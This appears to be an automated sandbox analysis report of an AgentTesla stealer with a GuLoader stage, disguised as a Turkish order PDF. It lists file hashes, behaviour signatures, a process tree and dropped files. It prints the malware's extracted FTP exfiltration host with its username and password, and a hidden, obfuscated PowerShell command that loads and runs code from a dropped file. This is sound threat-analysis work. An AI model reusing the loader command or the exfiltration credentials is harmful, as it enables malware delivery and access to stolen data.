Overview

overview

10

Static

static

1

SİPARİŞ...df.exe

windows7-x64

10

SİPARİŞ...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    11-12-2023 10:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SİPARİŞ NO.ZD33166-pdf.exe

  • Size

    684KB

  • MD5

    8db600d5b4168b5d358209fa4b85bd5f

  • SHA1

    d6822e043548fbacd692a14d7dc17250482c43bc

  • SHA256

    2ef9a5215999c03ea03636ae06f8c66b3ed1274153bdaec215a189cd148669b5

  • SHA512

    c2103215579019f69aa3e4adfa2067d90c9189c093c7b065e9693e3d8745f084810e7652dd0e2e6638eecc18344641aaa23460eb2799c3829b73462b08f741ca

  • SSDEEP

    12288:swFGHEDwfu4MFVS/GCFj+an2ry7/hFwz7ylgimtdYM3O0V7bbj:s5HEMfuDDSuCF6an2rg/hF7lgZtub0Vv

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Osirify120=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win';$Calvarias=$Osirify120.SubString(53221,3);.$Calvarias($Osirify120)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2356

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win
    Filesize

    52KB

    MD5

    b78df76358c01d725b0d9e498d32d595

    SHA1

    89c5bc6f9d1d1da207899ce0677c24a99329dc70

    SHA256

    6cacb39cdff332ae98782d33db6fc877a76a8e1e01fa7a0ec9acf45a19cca2ea

    SHA512

    d7268e8c0e6040515d385835206af5b67c78ec5f6c4bdf7053ec28c00e3dcfdfa318fd03935e989bd856e3614a2ebb2d8bc50e2ecdbe7433b211291b0746cf8d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Overfit.Hov
    Filesize

    270KB

    MD5

    ec46e3263c35f658579cd1572e57def0

    SHA1

    18468cb8363e04d8257fd5503cc6350ff7432b88

    SHA256

    690cdbe972c183ace073bad0f8567a3f2f2f15bf3f31e0e714797fdd68bc4e03

    SHA512

    d283ea4285dd37379499dc45128449b05b41229149d22819d3b40f80deba233be346741242d6f64f0697562f1fbec5d2818b7d05e0a4d95692246334bca85768

    Download Submit

  • memory/2356-171-0x0000000000C00000-0x00000000027C4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2356-166-0x0000000000C00000-0x00000000027C4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2356-178-0x000000006EA60000-0x000000006F14E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2356-176-0x0000000000C00000-0x00000000027C4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2356-173-0x000000006EA60000-0x000000006F14E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2356-172-0x000000006F150000-0x000000006F190000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2356-170-0x000000006F150000-0x00000000701B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2356-168-0x0000000076DD0000-0x0000000076F79000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2728-162-0x0000000006850000-0x0000000008414000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2728-165-0x0000000076FC0000-0x0000000077096000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2728-164-0x0000000076DD0000-0x0000000076F79000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2728-167-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2728-163-0x0000000006850000-0x0000000008414000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2728-169-0x0000000000310000-0x0000000000350000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2728-156-0x0000000000310000-0x0000000000350000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2728-153-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2728-161-0x0000000002A90000-0x0000000002A94000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2728-154-0x0000000073650000-0x0000000073BFB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2728-174-0x0000000006850000-0x0000000008414000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/2728-157-0x0000000000310000-0x0000000000350000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2728-155-0x0000000000310000-0x0000000000350000-memory.dmp

    Filesize

    256KB

    Download